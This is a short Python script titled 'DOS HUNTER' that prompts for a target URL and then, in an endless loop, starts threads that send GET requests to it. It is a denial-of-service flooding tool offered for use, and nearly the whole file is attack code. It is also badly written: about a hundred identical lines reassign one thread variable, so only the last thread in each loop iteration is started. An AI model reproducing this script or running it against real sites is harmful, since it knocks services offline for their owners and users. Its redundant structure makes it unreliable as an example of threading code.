import threading
import requests
import sys
from colorama import Fore
import time
from colorama import Fore, Style, init

#structura na zaqvkite
init(autoreset=True)

print(Fore.BLACK + Fore.WHITE + '\033[5m' + r"""                                                         
 ____   ___  ____    _   _ _   _ _   _ _____ _____ ____  
|  _ \ / _ \/ ___|  | | | | | | | \ | |_   _| ____|  _ \ 
| | | | | | \___ \  | |_| | | | |  \| | | | |  _| | |_) |
| |_| | |_| |___) | |  _  | |_| | |\  | | | | |___|  _ < 
|____/ \___/|____/  |_| |_|\___/|_| \_| |_| |_____|_| \_\
                                                         

""" + Style.RESET_ALL)


def make_request(url):
    response = requests.get(url)
    print(response.status_code)
time.sleep(2)
url = input("\033[0m[-] Enter the url: ")

while True:
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t.start()
